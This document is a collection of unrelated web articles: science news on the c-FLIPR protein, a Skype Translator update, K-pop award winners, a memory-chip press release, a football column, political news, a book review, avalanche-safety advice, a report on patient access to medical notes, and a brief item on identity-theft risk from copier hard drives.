The HZI researchers then took a closer look at the exact function of a certain variant of the protein , called c-FLIPR. They used mice to investigate what happens if this protein is always present in lymphocytes and other blood cells. Whereas the apoptosis inhibitor caused no anomalies in young mice, the scenario in older mice was quite different: "The composition of the lymphocytes was changed significantly," says Schmitz. "Furthermore the immune cells were strongly activated."
The overactivation is easily apparent in the body. The researchers found immune molecules, called autoantibodies, which attack the body's own tissue in the kidneys and lung. In addition, they detected harmful protein deposits in the kidneys. The changes in the lung tissue are also indicative of the immune system attacking its own body in the presence of too much c-FLIPR. "Immune cells migrate into the lung and attack the lung tissue," says Schmitz. Physicians usually see these symptoms in a human autoimmune disease called systemic lupus erythematosus
The HZI scientists discovered already last year that cells can fight bacterial infections better if c-FLIPR is turned on permanently. This means that inhibiting the suicide of cells has beneficial effects in acute infections, but leads to autoimmune reactions in the long run. "c-FLIPR is important for the balance of the immune system . It might be possible to intervene with suitable therapeutic agents if the equilibrium of the immune system is disrupted," says Schmitz.
Original publication
Microsoft and Skype will now help you converse in real time with Japanese speaker — even if you don't speak Japanese yourself.
Skype announced this week that it was adding Japanese to its real-time translation software, which it introduced in 2014.
In its announcement, Skype says:
Japan has also become a beloved destination for both tourism and business, and we're excited about the potential benefit Skype Translator will bring to Japan, the community and our users.
In order to use it, click on the globe icon in your chat menu. If you're using Windows 10, click the Skype translator button in the Preview app.
This isn't just for Skype, though. Japanese is now available in all Microsoft Translation services.
Japanese is the tenth language in the Translator's repertoire. The others are:
English
Spanish
Brazilian Portuguese
French
German
Italian
Mandarin Chinese
Arabic
Russian
According to the same post, Japanese was a tricky language to add. Skype hopes this will benefit native English speakers in particular, since Japanese is noted for being difficult for us to learn due to its different grammatical structure.
via Mashable
Read next: First credible Surface Pro 5 rumors materialize
The 2017 Asia Artist Awards were a glamorous night that celebrated some of the top stars in Korea's entertainment industry!
The ceremony was held on November 15 in Seoul, and awards were given out to stars in the fields of acting and music.
See Also: Performances From The 2017 Asia Artist Awards
EXO and actor Kim Hee Sun took home the grand prize (Daesang) in their fields, Super Junior was awarded the Legend award, and the Best Artist awards went to Namgoong Min, Park Hae Jin, Girls' Generation's YoonA, and SEVENTEEN.
See also: Stars Walk The Red Carpet At The 2017 Asia Artist Awards
Check out the full list below!
Rising Star Award: Kang Tae Oh, Ji Soo, Seo Eun Su, gugudan, MOMOLAND, JBJ, Jeong Sewoon, DIA
Samsung Pay – Super Rookie Award: Wanna One
Best Creator Award: Producing director Shin Won Ho
New Wave Award: Choi Tae Joon, Gong Seung Yeon, Shin Hyun Soo, SNUPER, ASTRO, The Rampage
Popularity Award: EXO, EXO's D.O., YoonA
Best OST Award: Ailee's “I Will Go to You Like the First Snow”
Fabulous Award: Lee Joon Gi, Park Seo Joon, EXO, Super Junior
Rookie Award: Ahn Hyo Seop, DIA's Jung Chaeyeon, Wanna One, PRISTIN, KARD
Choice Award: Min Hyo Rin, Lee Tae Im, Kent Tsai, Just Jerk
Best Entertainer Award: Sung Hoon, Kim Tae Ri, NU'EST W, MONSTA X, Bolbbalgan4
Best Icon Award: Seo Kang Joon, Crush, Hwang Chi Yeol, MAMAMOO
Asia Icon Award: Park Shin Hye
Asia Star Award: miss A's Suzy
Best Celebrity Award: 2PM's Junho, Park Min Young, Apink, VIXX
Best Star Award: Park Seo Joon, Ryu Jun Yeol, Block B's Zico, SNH48 7SENSES
Best Welcome Award: Lee Seung Gi
Best Artist Award: Namgoong Min, Park Hae Jin, YoonA, SEVENTEEN
Legend Award: Super Junior
Grand Prize (Daesang): EXO, Kim Hee Sun
Congratulations to all the winners!
Source (1) (2)
SAN JOSE, Calif.--(BUSINESS WIRE)--SK Hynix Inc. (or ‘the Company', www.skhynix.com) announced today that it is shipping mass production volumes of 1st generation High Bandwidth Memory (HBM1) based on SK hynix's advanced 20nm-class DRAM process technology. HBM1 represents a groundbreaking leap in performance by enabling a 1,024 bit wide memory interface to achieve 128GB/second performance while reducing power by 50% over traditional GDDR5 DRAM solutions.
HBM1 utilizes through-silicon-via technology and microbumps to interconnect 4 DRAM die and 1 base die to achieve 1GB DRAM density per device. High Bandwidth Memory is designed to be assembled onto interposers allowing high speed memory interconnect to GPUs, CPUs, ASICs and FPGAs.
In addition to the mass production announcement, SK Hynix is pleased to recognize AMD as a key partner in enabling HBM1 technology. AMD announced the Radeon™ R9 Fury X, the world's first graphics card with HBM technology in Los Angeles on June 16th. The AMD Radeon R9 Fury X graphics card utilizes 4GB HBM1 to achieve up to 512GB/second memory bandwidth performance while reducing memory subsystem power by up to 85%.
“AMD has pioneered the adoption of HBM1 technology in graphics applications achieving unprecedented memory bandwidth while reducing memory subsystem power” said Joe Macri, AMD Corporate Vice President and Product CTO, “Integrating AMD's Graphics Processing Unit and HBM1 on a single 2.5D silicon interposer represents a major step forward in high performance graphics applications”.
“High Bandwidth Memory technology is the first JEDEC standard memory targeted for interposer system-in-package applications, effectively breaking down the memory wall barrier through tight integration of DRAM and high performance processors” said Kevin Widmer, SK Hynix America Vice President of Technical Marketing, “The performance requirements of emerging graphics, computing and networking applications are driving the demand for High Bandwidth Memory”.
SK Hynix is well positioned to support customer demand for High Bandwidth Memory as part of a broad portfolio of DRAM, NAND and SSD solutions. The 1.2V 1GB HBM1 device is available now in production quantities.
About SK Hynix Inc.
SK Hynix Inc., headquartered in Korea, is the world's top tier semiconductor supplier offering Dynamic Random Access Memory chips (“DRAM”), Flash memory chips ("NAND Flash") and CMOS Image Sensors ("CIS") for a wide range of distinguished customers globally. The Company's shares are traded on the Korea Exchange, and the Global Depository shares are listed on the Luxemburg Stock Exchange. Further information about SK Hynix is available at www.skhynix.com.
About AMD
AMD (NASDAQ: AMD) designs and integrates technology that powers millions of intelligent devices, including personal computers, tablets, game consoles and cloud servers that define the new era of surround computing. AMD solutions enable people everywhere to realize the full potential of their favorite devices and applications to push the boundaries of what is possible. For more information, visit www.amd.com.
AMD, the AMD Arrow logo, Radeon and combinations thereof are trademarks of Advanced Micro Devices, Inc.
Get the biggest Sport stories by email Subscribe Thank you for subscribing We have more newsletters Show me See our privacy notice Could not subscribe, try again later Invalid Email
Jose Mourinho is finished.
Mourinho is yesterday's man. Mourinho looks sour and glum. Mourinho looks weary and despondent. Mourinho is angry and out of control. Mourinho has lost their mojo. Mourinho is nothing but a chequebook manager who no longer knows how to buy properly.
Mourinho has been superseded by a new generation of genius coaches.
You'll know the names, as there's plenty of them. Antonio Conte, Jurgen Klopp, Pep Guardiola, Mauricio Pochettino. Twelve rounds into a 38-game Premier League season each has already had at least one turn being lauded as the champion-manager-elect.
Conte was supposedly on the verge of breaking the land-speed record for a Roman Abramovich sacking, but then got tough on their players and switched to a five-man defence to win six League matches in a row. He's now top of the table and current flavour of the week in the 'why Mourinho's past it' camp.
(Image: Getty)
(Image: Liverpool FC/Getty Images)
Klopp, another manager unencumbered with European football, was the previous poster boy. Feted for their touchline dynamism and upbeat demeanour, the vigour of Klopp and Conte supposedly highlight all that has gone wrong with morose Mourinho.
Guardiola started their first season in England with 10 straight wins, converting the expectation that they would win the Premier League with Manchester City into heady discussion as to whether they would do so without a single defeat. Since then he's won three in 11 and exited the League Cup to Mourinho's Manchester United, yet theirs is a path to progress, their rival's a funeral cortège.
(Image: Getty Images)
(Image: Man Utd via Getty)
Pochettino's unbeaten start saw them cast as Guardiola's strongest rival for the title. Though Tottenham remains undefeated in the League, as many fixtures have been drawn as won, the Argentine's Champions League campaign has been reduced to a Europa League play-off against CSKA Moscow, and he's already departed the League Cup.
All four new generation coaches have another thing in common. Not one of them has won a Premier League title. By the end of this season at least three of them still won't have won one.
Only Conte and Guardiola can match Mourinho's achievement in winning that title at the very first attempt. It is an interesting argument as to whether any of the four musketeers will eventually emulate Mourinho's standing tally of three Premier Leagues titles (from five complete campaigns), never mind whatever number the 53-year-old eventually extends that to.
Should Conte take more or less the same group of players that Mourinho led at Chelsea last year and pair a domestic cup with a League title won with three games to spare they will merely have matched their predecessor's last great achievement at Stamford Bridge. (And even then Conte will have done it stripped of the demands of simultaneously competing in Champions League and with a heavier net transfer spend.)
(Image: Shaun Botterill)
Little wonder then that Mourinho complains about critics who portray them as a spent force. "Should we be respected even in periods when our results are not that best?” they asked ahead of last weekend's League meeting with Arsene Wenger. “I think Mr Wenger gets that. I don't think I do. Even though my last Premier League title was 18 months ago. No respect."
Twenty-four hours later, after their Manchester United dominated an encounter which was supposed to have underlined the nature of their demise, Mourinho returned to that theme of disrespect: “I said it at the press conference yesterday. The Arsenal manager hasn't won a championship in 14 years; I haven't won a championship in 18 months. He, in 14 years, failed to build a team to be champion; I've been here for four months. And the demand is only for me and not for others.”
It is as though Mourinho's critics have forgotten the outcomes of the three Manchester United campaigns since Sir Alex Ferguson retired as manager, finishing seventh, fourth and fifth in the Premier League, 22, 17 and 15 points adrift of the winners. It is as though Mourinho was expected to immediately repair six transfer windows of profligate, horribly judged player trading, immediately returning the club to the summit of what is generally regarded as the most competitive Premier League ever staged.
It is no coincidence that during the long months in which United's owners deliberated upon Louis van Gaal's sacking and succession both Guardiola and Pochettino were approached about taking on the job, and both preferred positions elsewhere. Guardiola because Manchester City's squad was stronger, they had the promise of complete boardroom backing, and they considered the challenge less demanding. Pochettino because they fretted they aren't yet ready for a club of United's dimensions and degree of external attention.
(Image: John Peters)
Perhaps the argument lies in pairing United's peripatetic start to this Premier League campaign with Chelsea's travails in Mourinho's last one at Stamford Bridge. We all know that no Premier League champions have ever suffered such a vertiginous descent in fortunes as that.
Yet there are Leicester City, 12 games into their first title defence and two points off the relegation zone.
Perspective. If Jose Mourinho wasn't finished, yesterday's man, sour, glum, weary, despondent, angry, out of control, dependent on a chequebook, and surpassed by all around him, perhaps this one of just two Premier League managers still competing for four trophies (the other isn't Conte, Klopp, Guardiola or Pochettino) might benefit from some.
In 1985, only 55% of women having premarital sex the first time used a contraceptive. Thanks for helping to spawn a large Gawker readership 25 years later, unintentional moms! Nowadays, Americans send a new message with their fucking: Fuck God.
Things have changed since the awesome, sexy condom-free days of 1985. Premarital sexing ladies now use contraception at an 84% clip, according to a new survey. More importantly, we've finally settled the whole "religion" question here in the USA. Fucking wins, god loses.
Religious teachings forbidding contraceptives are almost universally ignored in the United States, since 99 percent of women between the ages of 15 and 44 who had sex at least once have used some form of contraception.
People fucking rationally. Suck on that, The Pope.
[NYT. Pic via]
On behalf of the American people, Michelle and I want to extend our best wishes to Muslims in America and around the world. Ramadan Kareem.
Ramadan is a time when Muslims around the world reflect upon the wisdom and guidance that comes with faith, and the responsibility that human beings have to one another, and to God. This is a time when families gather, friends host iftars, and meals are shared. But Ramadan is also a time of intense devotion and reflection – a time when Muslims fast during the day and pray during the night; when Muslims provide support to others to advance opportunity and prosperity for people everywhere. For all of us must remember that the world we want to build – and the changes that we want to make – must begin in our own hearts, and our own communities.
These rituals remind us of the principles that we hold in common, and Islam's role in advancing justice, progress, tolerance, and the dignity of all human beings. Ramadan is a celebration of a faith known for great diversity and racial equality. And here in the United States, Ramadan is a reminder that Islam has always been part of America and that American Muslims have made extraordinary contributions to our country. And today, I want to extend my best wishes to the 1.5 billion Muslims around the world – and your families and friends – as you welcome the beginning of Ramadan.
I look forward to hosting an Iftar dinner celebrating Ramadan here at the White House later this week, and wish you a blessed month.
May God's peace be upon you.
Read a translation: Arabic | Bengali | Dari | French | Hindi | Indonesian | Pashto | Persian | Punjabi | Russian | Turkish | Urdu
The global journalist defense group Reporters Without Borders want the International Criminal Court and the United Nations to consider attacks on journalists war crimes.
The U.N. Security Council met Friday to discuss what can be done to protect journalists amid news that more than 50 have been killed so far this year. An estimated 90 percent of those deaths go unpunished.
The Associated Press reported:
The director of Reporters Without Borders, Christophe Deloire, called the statistics on killings “sinister” and warned that impunity amounts to “encouragement” for more attacks. Deloire said 88 journalists were killed in connection with their work last year — a record since the organization started keeping count in 1995. The British ambassador to the U.N., Mark Lyall Grant, told the chamber, “This is not just an issue for media, it's an issue for all of us.”
The proposal found support among attendants of the security council meeting. The Guatemalan ambassador, one of the meeting's hosts, called the idea a good one, especially with many attacks on reporters occurring in countries with dysfunctional or collapsed judicial systems.
As reporters subject to the United States' increasingly hostile Justice Department know, the threats to journalists include imprisonment. The briefing notes for the meeting said 183 journalists around the globe are currently in prison.
— Posted by Alexander Reed Kelly.
File photo of Jammu and Kashmir Chief Minister Omar Abdullah
Jammu and Kashmir chief minister Omar Abdullah has said they will not stop opposing Narendra Modi , the BJP's prime ministerial candidate, even if that means having to take a bus to Pakistan.Mr Abdullah was making a sardonic reference to a speech made by Giriraj Singh, a BJP candidate in Bihar, who made national headlines last week by saying "Narendra Modi's critics should go to Pakistan." ( Read: Remarks on Muslims by Pravin Togadia, VHP, trigger new controversy "Well, I'm glad he's given us this indication because God forbid when Modi becomes PM, I will find myself a seat on the Srinagar-Muzzafarabd bus and that's it. No, jokes apart, I think this shows an extreme level of intolerance that has never been seen before...I disagree with a whole lot of things that Mr Narendra Modi stands for but I don't think that makes me any less Indian than a person who supports Mr Modi," Mr Abdullah told NDTV.At an election rally in Anantnag district, they said, "I will get a ticket from here to Muzaffarabad, because I will not stop opposing Modi."BJP spokesperson Nirmala Sitharaman said today, "Mr Adbullah, please focus on governing Jammu and Kashmir."She also said, "On Giriraj Singh, we have made our position clear, they can look at it critically when they have time."The Bihar leader has reportedly been strongly reprimanded by the party leadership. This morning, Narendra Modi tweeted, "Petty statements by those claiming to be BJP's well wishers are deviating the campaign from the issues of development & good governance...I disapprove any such irresponsible statement." ( Read: No irresponsible statements please, says Narendra Modi after Togadia controversy The #ModiSendMeToPak hashtag trended on Twitter on Monday as many jokes and jibes were exchanged.The BJP candidate for the Nawada Lok Sabha seat had said, "Those who want to stop Narendra Modi (from becoming prime minister) are looking towards Pakistan. In the coming days, they will have no place in India. They will only have place in Pakistan."The Bihar police have registered a First Information Report or FIR against Mr Singh.
From creationism to ESP: Why believers ignore science A journalist's investigation of strange beliefs and the people who hold them leaves them questioning themselves
Will Storr knows exactly what sort of book you expect "The Unpersuadables: Adventures With the Enemies of Science" to be. They open it with a gathering they covered in a small town in rural Australia, a place nicknamed after a species of tree with potentially lethal stingers. A couple of hundred people gathered there to hear John MacKay, a science teacher turned creationist, lay out evidence for their belief that the world was created by God, 7,000 years ago.
"I see the lines there," Storr thinks, looking down at their notepad, "ready to be filled with descriptions and strings of overheard dialog and the thoughts I'll think about these Christians, these crazy Christians; the words that will make up the story that will be read by people just like me. I see the lines, and I already know what they're going to say." None of it will answer the nagging question of why people believe the strange things they do.
Advertisement:
And if Storr is sure of anything -- being sure emerges as a dubious quality in the course of "The Unpersuadables" -- it's that he's tired of how this story has been told. They don't believe in creationism, and sees no reason why they ever should, but after quizzing a few of the attendees about their understanding of the scientific substance of the creationist debate, they admit that their own pro-evolution position is just as faith-based as theirs. "Like so many people who hold strong opinions about it, I have never studied evolution. I have exercised no critical thinking on the topic whatsoever."
And so begins a searching, extraordinarily thoughtful exploration of what it means to believe anything -- not just the weird things that the fanatics, eccentrics and heretics that Storr interviews believe. These renegades lavish their conviction on everything from the fairly respectable (homeopathy) to the decidedly not (Holocaust denial) and their fixations range from from such classics as UFOs and ghosts to an obscure malady called Morgellons, whose sufferers believe that their skin has been infested by a mysterious agent that some think is a rare parasite and others are sure is a top-secret form of nanotechology run amok. Storr undergoes past-life regression and attends a huge convention of the followers of a superstar guru whose breathing exercises are said to cure cancer. ("It has been found that cancer cells cannot thrive in a highly oxygenated environment," a follower informs him.) They also rub shoulders -- and butts heads -- with public figures from the thriving skeptic community.
"The Unpersuadables," like most books intended to make you think rather than to tell you all the ways you're right, is difficult to characterize. It contains a larger portion of autobiographical material than some readers will expect or welcome, but to my mind this background creates an illuminating context for Storr's perpetual self-questioning. In their youth, they rebelled against their parents' Catholicism and expectation that he'd go to college; they also suffered from periods of depression, kleptomania and obsessive, self-destructive jealousy. Now a novelist and journalist, Storr comes across as a man on even footing who never takes that evenness for granted. They also like outsiders and dissenters, having spent the first part of their life adamantly refusing to fulfill their family's dreams for him.
Fortunately for Storr, they wanted to write and he's really good at it. Each chapter in "The Unpersuadables" plunges the author into a peculiar subculture, and each has its own narrative flavor. The account of a family who discovers that their late, estranged daughter and sister had fallen into the clutches of therapists convinced of the existence of networks of Satanic ritual child abusers, murderers and cannibals works like a detective story. Another on Lord Monckton, a famous British climate-change denier, is a profile in reactionary nostalgia as a way of life. The Morgellons chapter is, of course, a medical thriller, although the results are not vindicating when Storr finds a doctor willing to analyze some fibers for a sufferer. (Most medical professionals view even the request to have such lab work done as a symptom of a psychological disorder, but this particular physician had been afflicted with a rare parasite themselves and sympathized.) And Storr tries -- very, very hard, in a chapter resembling a courtroom drama -- to get to the bottom of some troubling disputes surrounding the presiding saint of the skeptics movement, James Randi.
Running through all these stories is Storr's growing uncertainty about certainty. In the first chapter, they present their readers with a conundrum: "I consider -- as everyone surely does -- that my opinions are the correct ones," yet to assume that they really are right about everything "would mean that I possess a superpower: a clarity of thought that is unique among human beings. Okay, fine. So accept that I am wrong about things -- I must be wrong about them." Yet when Storr surveys their own views, again, they all strike them as spot-on. "I know that I am not right about everything, and yet I am simultaneously convinced that I am. I believe these two things completely, and yet they are in catastrophic logical opposition to each other."
Such rumination undermines Storr's faith in their convictions, rooted as they once were in the rather quaint confidence that human beings make up their minds rationally. Instead, exploring recent developments in neuroscience, they learn that we believe first -- engaging mental models formed early in life and rarely amenable to change -- and come up with the reasons for it afterward. By the now-familiar process of confirmation bias, we ignore what doesn't support our most favored notions, and shine a brilliant spotlight on the ones that do. Our minds operate unconsciously to a flabbergasting degree, while our consciousness is forced to tag along after, cooking up convincing rationales. "We do not get to choose our most passionately held views, as if we are selecting melons in a supermarket," is Storr's provocative conclusion.
Advertisement:
The two most memorable chapters in "The Unpersuadables" exemplify two ways of responding to the unreliability of even the most reliable mind. In the first, Ron Coleman, the founder of an advocacy group for people who hear voices, explains that the two they hear (his late wife and a priest who molested them when they were a boy) are really portions of their own self trying to communicate with him. They went off the psychiatric drugs that are, despite their crushing side effects, the inevitable official treatment for people who hear such voices and get labeled as schizophrenic. They strove instead to negotiate and live with them, and they created Hearing Voices Network to help others try this, too. The group and some supportive psychiatrists have argued that the voices are not a symptom of "some disease in their brain," but a reaction to early trauma, and that this is simply the way some brains respond to such emotional damage. But whatever the cause, Coleman sounds more humane and even more reasonable than the institutions that want to drug them into lethargy.
Most fascinating of all, however, is Storr's account of going on a tour of World War II sites with David Irving, a historian notorious for their position on the Holocaust. This is a somewhat unstable body of claims that has included Irving's insistence that fewer than 6 million Jews were murdered by the Nazis, that the concentration camps did not contain gas chambers and that whatever happened to the Jews was not Hitler's fault, anyway. (In an inversion of the old "just following orders" defense, Irving's Hitler was ill-served by scheming genocidal underlings.)
This narrative is a tour de force in which Storr tries to blend in with a group of men whose flagrant racism makes them want to gag. Meanwhile, they are ever seeking a sit-down with the surly, stand-offish Irving, who will barely speak civilly to any of them. This bizarre expedition is managed by Irving's assistant, a beautiful young blonde who takes care of them to the point of mending their trousers, but has no romantic interest in him. "He thinks they adore me," they tell Storr. Meanwhile, the men tour concentration camps where Irving triumphantly points to the handles on the inside of the doors to the "alleged" gas chambers, but they fail, Storr observes, to notice the bolts on the outside of the doors. All this culminates in a flabbergasting conversation in which Irving explains away Hitler's several unequivocally genocidal anti-Semitic remarks as mistranslations and "reading between the lines." "It's not between the line," Storr says in exasperation. "It's on the line." But Irving remains unmoved and unmovable, so eventually Storr flies back to the U.K. to marry a woman of Pakistani-English heritage. There are entire novels that do less than Storr achieves here in a mere 30 pages.
That Storr finds many self-professed skeptics to be just as knee-jerk in their opinions as any other flavor of fanatic is not surprising, but their dogged approach to nailing many of the most celebrated skeptics in lies and misrepresentations is welcome. That's not to say that Storr agrees with the other people they interviewed; in fact, they retain their disbelief in telepathy and UFOs despite liking many of the people who are convinced they exist. But the gleeful self-righteousness of some of the skeptics, their conviction that they are the only ones who aren't judging the world through a scrim of prejudice and wishful thinking, understandably irks him, as does their fondness for presenting themselves as heroes. "Christians or not, there will be tribalism," they write. "Televangelists or no, there will be scoundrels. It is not religion or fake mystics that create these problems, it is being human." Criminality, intolerance and hatred should be stopped, but "where there is ordinary madness, we should celebrate. Eccentricity is our gift to one another. It is the riches of our species. To be mistaken is not a sin. Wrongness is a human right."
The "Mad Men" star helped design the space with sliding screens and a bed that suspends from the ceiling when it's not in use.
Among Hollywood actors, there are no small parts — but there are small houses, and Vincent Kartheiser's is perhaps one of Hollywood's smallest. The actor, who portrays Pete Campbell on “Mad Men,” posed in Dwell magazine last year in their cleverly-designed tiny house.
Now they have listed their 603-square-foot, 1-bedroom, 1.5-bath Hollywood home for sale for $808,000. Perhaps he's searching for a new space that is better for two — the actor is engaged to co-star Alexis Bledel.
The little bungalow has an open floor plan to suit Kartheiser's taste for lofts, and it's loaded with space-saving surprises. For example, the bed hangs from the ceiling via a pulley system, counterbalanced by a 300-lb weight hidden in the closet. While the bed is looming overhead, the redwood headboard flips down into a desk.
A red theater curtain pulls across the bedroom for privacy, and the lid of the outdoor coffee table lifts off to reveal a fire pit. Along one edge of the house, a series of shoji screens slide on a track to reveal — or hide — the bathroom and closets.
Kartheiser bought the bungalow 10 years ago for $547,000 and worked closely with designer and builder Funn Roberts to redesign it in 2010.
The home is listed by Tregg Rustad of Rodeo Realty.
Related:
Emily Heffter, a reporter and writer for Zillow Blog, covers celebrity real estate, unusual properties, and other real estate topics. Read more of their work here.
FLAGSTAFF
Klee Benally said more than 50 people who protested the opening of the Arizona Snowbowl have been arrested within the past four years.
“Some of them multiple times,” said Benally, an environmental activist who's also been arrested a number of times for rallying the use of reclaimed sewage on the San Francisco Peaks.
More than a dozen individuals on Nov. 20 rallied against the opening of Snowbowl once again outside Flagstaff City Hall, arguing that the wastewater snow poses risks to public health and the ecology of the Peaks, which is considered sacred by at least 13 American Indian tribes.
“We have to stand here,” said Christopher Jocks, a Kahnawake Mohawk professor in the applied indigenous studies at Northern Arizona University, who canceled one of their morning classes to take part in the protest.
“I don't care how many years and how many times we come here, we have to keep standing here.”
Through a megaphone, Benally shouted slogans such as “stop exploitation of public lands,” “for respect, for cultural survival,” “to respect Mother Earth,” “to respect the cultures of 13 indigenous nations,” “for environmental integrity of the San Francisco Peaks,” “don't ski on pee,” “no desecration for recreation,” and famously, “boycott Snowbowl!”
According to the CAIC there has been 11 avalanche related deaths in January. This is the largest number of avalanche-related deaths since at least 2001. The accidents have occurred in Colorado, Utah, Wyoming, Washington, Montana, and Alaska.
I called up Doug Chabot, the director of the Gallatin National Forest Avalanche Center, to basically ask, “What the hell is happening?” What's this deadly mix of conditions that's killing skiers, snowboarders, and snowmobilers all over the West? “It's kind of getting out of hand,” they told me. “We are seeing quite the cycle of human triggered avalanches right now, and they aren't going naturally.” These avalanches are big, they're human triggered, and they're happening on steep slopes with hazardous terrain traps so the fatality rate has been extremely high.
ADVERTISEMENT Thanks for watching! Visit Website
So here's the breakdown, paraphrased from the expert himself. The snowpack throughout the West, more specifically in the Rockies, is very similar right now (which explains why the same type of deadly slides are happening all over). “We've got depth hoar, sugary faceted snow at the ground. Depth hoar stays weak for a long time.” Chabot told me. It can take months for these weak layers deep in the snowpack to become strong again— it can even take the whole season. These weak layers formed in November resulting in tons of natural avalanches in December. After the new year, there was a dry spell, not a ton of snow going on. And as you all know, we skiers like snow. “So once it started snowing again, people started really getting after it, searching for turns even though this weak layer is still quite weak.”
ADVERTISEMENT Thanks for watching! Visit Website
ADVERTISEMENT Thanks for watching! Visit Website
This is the deadly equation: A “moderate” or “considerable” avalanche danger rating plus a big snowstorm following a dry spell. We also have to consider the fact that backcountry skiing is a growing industry so there is more pressure to go farther and steeper to find the untouched snow. “People are getting out on steep slopes and they've either been thinking that the snow is stable or they aren't thinking about it. Moderate is not a green light.”
At a “moderate” rating, human triggered avalanches are possible, but too many people are associating the rating with stable conditions. The same thing is happening when the danger is “considerable.” Chabot wants to encourage people to study the description, photos, and videos on their avalanche center's website as to optimize their understanding of the conditions. “Avalanche danger descriptors are just one word, so we really want people to the read the advisory— that's what will have the life-saving information.”
“You can get away with a lot right now,” Chabot said. And that's part of the issue. A lot of these slides are happening on slopes that had tracks already running down them. People see those tracks and think “safe,” but on those steep dangerous slopes, the reality is somebody just hasn't hit the trigger point yet.
So what can you do? How do we stay safe?
Right now Chabot's avalanche center is recommending that people stay off all steep slopes. “We are doing it,” they told. “We are being extremely conservative right now.”
“People should be calling their avalanche centers every day they go into the backcountry, they should look at the photos and videos we put online, and they need to take a class.” Chabot said.
The likelihood of human triggered avalanches has gone down, signs of instability are absent, so the best way to properly assess the conditions of a slope right now is to dig a pit.
Be safe out there, folks.
Posted July 21, 2017 at 1:00 am
- The 200 years rule of thumb for resetting
It's possible Tedd is somewhat biased in their assessment of whether Pandora has the right idea about not resetting to be with Adrian.
Worth noting is that, while Tedd was undoubtedly told by Sarah about Pandora's age, Tedd had to deduce for themselves why Pandora hasn't reset.
Granted, it wasn't exactly rocket science, but in the course of editing and such, I very nearly left off Tedd adding "right?" after giving the reason in panel four, making it sound much too much like they knew for certain and had been told by someone. It doesn't take much of a missing detail to make everything explode, does it?
Speaking of which, I think I've forgotten Tedd's glove at least once per each comic it's been in. I managed to include it before posting the comic this time, at least, but only because I edited it in after finishing the rest of the comic. This would sting my pride less if it wasn't for me forgetting to include it in a panel it's in which it's mentioned. Thank goodness he's been told to take it off.
- EGS:NP
There was a collective gasp from the group now gathered around me; and I could guess what they were thinking as they craned their necks to peer into the exam room where my elderly patient was busy fussing with their papers as their wife stood adjusting the canvas fishing hat on their head.
The barbarians are at the gate.
For 40 years, the tension over patient access has been playing out in hospitals, clinics and doctors' offices. Although medical records have always been accessible to clinicians, payers, auditors and even researchers, it was not until the 1970s that a few states began giving patients the same rights.
While a handful of physicians is vocal supporters of these early efforts, the majority of doctors were far less enthusiastic. They worried that their notes might become a source of unnecessary stress for patients. Read without an experienced clinician's interpretation, slight abnormalities like an elevated cell count from a viral infection could turn into a life-threatening cancer in the eyes of patients.
Even routine abbreviations and jargon like “S.O.B.” (shortness of breath) and “anorexic” (a general lack of appetite, not the disease anorexia nervosa) could be confusing at best and inadvertently demeaning at worst. Doctors, already pressed for time, shuddered at the idea of suddenly being responsible for the worries of a reading public.
Photo
In 1996, despite these concerns, the Health Insurance Portability and Accountability Act, or HIPAA, gave all patients the legal right to read and even amend their own medical records. At the time, a group of national health care experts hailed this new transparency as a necessary component of better and safer care.
But today, few patients have ever laid eyes on their own records. And those who try often come back from their missions with tales of bureaucratic obstacles, ranging from exorbitant copying costs to diffident administrators. The same concerns from 40 years ago come up again and again, with little evidence to support or refute the claims of either side. Should medical records be shared as interactive documents between patients and physicians? Can transparency work, or will it end up worrying patients, muddling the patient-doctor relationship and adding more work to an already overburdened primary care work force?
Now, according to the latest issue of the Annals of Internal Medicine, the answers to these questions may finally be answered in a year's time.
Newsletter Sign Up Continue reading the main story Please verify you're not a robot by clicking the box. Invalid email address. Please re-enter. You must select a newsletter to subscribe to. Sign Up You will receive emails containing news content , updates and promotions from The New York Times. You may opt out at any time. You agree to receive occasional updates and special offers for The New York Times's products and services. Thank you for subscribing. An error has occurred. Please try again later. View all New York Times newsletters.
This summer, researchers have begun the largest study to date of open access, aptly named Open Notes, involving over 100 primary care physicians and approximately 25,000 patients from three health care centers — the Beth Israel Deaconess Medical Center in Boston, the Geisinger Health System in Danville, Pa., and the Harborview Medical Center in Seattle. In the study, patients who have just seen their doctors will receive an e-mail message directing them to a secure Web site where they can view the signed physician notes. Patients will receive a second e-mail message two weeks prior to any return visit, reminding them that the notes from their previous visit are available for review.
Advertisement Continue reading the main story
Over the course of the yearlong study, funded by the Robert Wood Johnson Foundation, the Open Notes investigators hope to analyze the expectations and experiences of patients and physicians, as well as examine the number of additional phone calls, e-mail messages and visits that may arise as a result of more patients viewing their doctors' notes. In addition, a public survey on the journal's Web site will assess the opinions of any patient or doctor not enrolled in the study.
“We have one simple research question,” said Dr. Tom Delbanco, a lead investigator who is a primary care physician at the Beth Israel Deaconess Medical Center. “After a year, will the patients and doctors still want to continue sharing notes?”
While enrolling patients in the study has not been difficult, finding physicians who are willing to participate has been more challenging. A few doctors were quick to sign on, but “most physicians were ambivalent at best,” noted Jan Walker, a registered nurse and health services researcher at Beth Israel Deaconess who is the study's other lead investigator. Many physicians were worried about workload and issues of clarity.
“The note is really a story,” said Dr. Sara B. Fazio, a primary care physician at Beth Israel Deaconess who hesitated at first but is now one of the participating doctors. “The meaning of a story depends on the storyteller. Just because I write something down as my version of the facts doesn't mean that they will be the absolute facts or that another person could not interpret those facts differently.” While physicians recognize that such differences in interpretation occur frequently, particularly across different specialties, patients may not. “A doctor's note could come across in a very unexpected way to a patient even when the doctor wrote it with the best of intentions,” Dr. Fazio said.
The researchers are hopeful that their study will help to settle many of the longstanding issues regarding open access, but one thing has already become apparent. For at least a few of those involved, the once sharply demarcated lines of the decades old tension have begun to fade. It is no longer so clear who exactly stands on what side of the medical records wall.
“In the end,” Dr. Fazio said in an e-mail message, “we are all patients — if not now, then someday — and from that perspective it is easy to see the many reasons why this is a step in the right direction.”
They added, “I suspect the physician in me will eventually be won over by that perspective given a little time.”
Brian Harkin for The New York Times
While it's common knowledge that leaving sensitive personal information in trash bins or on computers raises the risk of identity theft, many consumers may not be aware that copying sensitive information on certain copy machines could also put them at risk.
Last month, CBS News highlighted the identity theft threat from copiers in an investigative report “Copy Machines, a Security Risk?”
In the CBS report, which we learned about from the Beyond Paycheck to Paycheck blog, the correspondent, Armen Keteyian, noted that many copiers contained hard drives filled with images of every document they'd ever copied. Often, owners don't wipe these hard drives clean before selling the machines.
